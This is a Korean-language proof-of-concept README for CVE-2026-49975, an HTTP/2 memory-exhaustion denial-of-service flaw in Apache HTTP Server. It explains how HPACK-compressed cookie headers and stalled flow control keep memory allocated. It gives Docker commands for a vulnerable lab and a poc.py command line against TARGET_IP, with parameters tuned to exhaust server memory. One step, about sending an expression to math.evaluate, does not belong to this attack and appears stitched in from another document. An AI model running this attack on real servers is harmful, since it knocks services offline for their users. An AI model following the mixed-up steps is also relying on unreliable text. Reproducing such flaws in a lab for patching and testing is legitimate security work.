
HTTP/2 폭탄
★ CVE-2026-49975 HTTP/2 Bomb PoC ★
https://github.com/user-attachments/assets/89310771-f704-45d1-a6c3-d910de1dbc74
CVE-2026-49975은 Apache HTTP Server의 서비스 거부(DoS) 취약점입니다. 이 취약점은 HTTP/2 요청 처리 경로에서 발생하며, 여러
cookie헤더 필드가LimitRequestFields에 제대로 집계되지 않은 채 병합될 수 있습니다. 공격자는 많은cookie헤더 필드로 확장되는 작은 HPACK 인코딩 HTTP/2 요청을 전송하여 Cookie 헤더 병합 중 서버가 반복적으로 메모리를 할당하도록 만들 수 있습니다. 그런 다음 공격자는 HTTP/2 흐름 제어를 사용하여 응답 전송을 지연시키고, 영향을 받는 스트림을 열린 상태로 유지하여 할당된 메모리가 해제되지 않도록 할 수 있습니다.
| 분류 | 버전 |
|---|---|
| 취약 | Apache HTTP Server 2.4.17 ≤ 버전 ≤ 2.4.67 |
| 패치됨 | Apache HTTP Server 2.4.68 이상 |
취약한 Apache HTTP Server 환경을 빌드하고 실행합니다.
docker build -t cve-2026-49975 .
docker run -d --name cve-2026-49975 --memory 8g -p 10081:80 cve-2026-49975
취약한 환경을 시작한 후, 아래 단계에 따라 공격을 재현합니다.
docker stats cve-2026-49975
출력 예시:
CONTAINER ID NAME CPU % MEM USAGE / LIMIT MEM %
xxxxxxxxxxxx cve-2026-49975 0.5% 35.2MiB / 8.0GiB 1.7%
다음 표현식을 math.evaluate로 전송합니다(예: 애플리케이션의 계산 입력을 통해).
python3 poc.py \
--host TARGET_IP \
--port 10081 \
--connections 10 \
--streams 100 \
--refs 4091 \
--initial-window 0 \
--hold 300 \
--drip-interval 2 \
--drip-bytes 1
공격 스트림이 열려 있는 동안 Apache 컨테이너의 메모리 사용량이 증가하고 높은 수준을 유지하는지 확인합니다.